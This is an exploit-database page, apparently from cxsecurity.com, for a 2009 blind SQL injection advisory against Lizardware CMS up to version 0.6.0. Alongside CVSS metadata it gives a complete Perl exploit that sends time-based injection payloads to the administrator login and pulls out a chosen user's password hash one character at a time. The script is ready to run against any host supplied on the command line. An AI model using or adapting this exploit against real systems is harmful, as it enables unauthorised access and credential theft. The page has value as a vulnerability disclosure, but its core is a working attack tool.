Lizardware CMS <= 0.6.0 Blind SQL Injection

2009.05.05
Credit: staker[
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl -w # Lizardware CMS <= 0.6.0 Blind SQL Injection Exploit # by athos - staker[at]hotmail[dot]it # http://sourceforge.net/projects/lizardwarecms/ use strict; use LWP::UserAgent; my ($stop,$start,$hash); my $domain = shift; my $ptable = shift; my $userid = shift or &usage; my @chars = (48..57, 97..102); my $substr = 1; my $http = new LWP::UserAgent; &usage unless $domain =~ /^http:\/\/(.+?)$/i and $userid =~ /^[0-9]$/; sub send_request { my $post = undef; my $host = $domain; my $param = shift @_ or die $!; $host .= "/administrator/index.php?loginsubmitMTIyOTU0ODExMg== "; $post = $http->post($host,[ user => $param, pass => 'anything' ]); } sub give_char { my $send = undef; my ($charz,$uidz) = @_; $send = "' or (select if((ascii(substring". "(user_password,$uidz,1))=$charz),". "benchmark(230000000,char(0)),". "0) from ${ptable}_users where user_id=$userid)#"; return $send; } for(1..32) { foreach my $set(@chars) { my $start = time(); send_request(give_char($set,$substr)); my $stop = time(); if($stop - $start > 6) { syswrite(STDOUT,chr($set)); $substr++; last; } } } sub usage { print "[?] Lizardware CMS <= 0.6.0 Blind SQL Injection Exploit\n"; print "[?] by athos - staker[at]hotmail[dot]it\n"; print "[?] Usage: perl $0 http://[host/path] [table_prefix] [id]\n"; exit; }

References:

http://www.milw0rm.com/exploits/7507


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top